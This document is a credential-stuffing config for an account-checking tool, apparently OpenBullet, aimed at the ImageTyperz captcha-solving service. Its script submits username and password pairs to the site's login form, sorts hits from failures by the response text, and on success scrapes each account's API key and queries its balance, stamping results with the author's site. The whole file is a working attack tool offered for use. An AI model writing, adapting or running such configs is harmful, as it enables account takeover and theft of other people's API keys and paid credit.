[SETTINGS]
{
  "Name": "ImageTyperz",
  "SuggestedBots": 1,
  "MaxCPM": 0,
  "LastModified": "2019-07-02T23:44:17.1972355+01:00",
  "AdditionalInfo": "",
  "Author": "HvH.site",
  "Version": "1.3.1 [Anomaly]",
  "LoliSave": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": false,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "EncodeData": false,
  "AllowedWordlist1": "",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}

[SCRIPT]
REQUEST POST "https://www.imagetyperz.com/Forms/bypasscaptcha.aspx" 
  CONTENT "__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwULLTE1MDU0MjY4NzEPZBYCZg9kFgICAw9kFgICAQ9kFgICAQ8PFgIeBFRleHRlZGRkZ1W%2BZMu2H%2FyAdVU%2FZXcu9WcE4LY%3D&__VIEWSTATEGENERATOR=567E63D4&__EVENTVALIDATION=%2FwEWBQKB2%2BvDAgLJ4frZBwL90KKTCAKSzO2ZAwL40JWiCh02NVS489WHg%2BjW6V3LwRPcz9sR&ctl00%24ContentPlaceHolder1%24txtUsername=<USER>&ctl00%24ContentPlaceHolder1%24txtPassword=<PASS>&ctl00%24ContentPlaceHolder1%24txtcode=&ctl00%24ContentPlaceHolder1%24btnSubmit=Login" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER ": scheme: https" 
  HEADER "accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3" 
  HEADER "accept-encoding: gzip, deflate, br" 
  HEADER "accept-language: en-GB,en-US;q=0.9,en;q=0.8" 
  HEADER "cache-control: no-cache" 
  HEADER "content-length: 475" 
  HEADER "content-type: application/x-www-form-urlencoded" 
  HEADER "origin: https://www.imagetyperz.com" 
  HEADER "pragma: no-cache" 
  HEADER "referer: https://www.imagetyperz.com/Forms/bypasscaptcha.aspx" 
  HEADER "upgrade-insecure-requests: 1" 
  HEADER "user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36" 

KEYCHECK 
  KEYCHAIN Success OR 
    KEY ">Logout<" 
  KEYCHAIN Failure OR 
    KEY "Invalid username or password. Please try again.<" 
    KEY "Invalid username or password." 

PARSE "<SOURCE>" LR "_txtToken\" class=\"acc_form\" readonly=\"readonly\" value=\"" "\" />" -> CAP "API key" 

REQUEST POST "http://www.captchatypers.com/Forms/RequestBalanceToken.ashx" 
  CONTENT "token=<API key>&action=REQUESTBALANCE" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

PARSE "<SOURCE>" LR "" "" -> CAP "Balance" "" " | HvH.site" 

